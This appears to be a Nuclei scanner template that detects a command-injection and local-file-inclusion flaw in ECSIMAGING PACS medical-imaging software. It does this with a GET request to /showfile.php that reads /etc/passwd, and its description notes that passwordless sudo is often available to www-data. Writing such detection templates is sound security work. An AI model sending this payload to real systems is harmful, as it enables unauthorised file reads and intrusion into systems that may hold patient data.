id: ecsimagingpacs-rce info: name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion author: ritikchaddha severity: critical description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. reference: https://www.exploit-db.com/exploits/49388 metadata: max-request: 1 verified: false tags: ecsimagingpacs,rce classification: cwe-id: CWE-78 http: - method: GET path: - "{{BaseURL}}/showfile.php?file=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200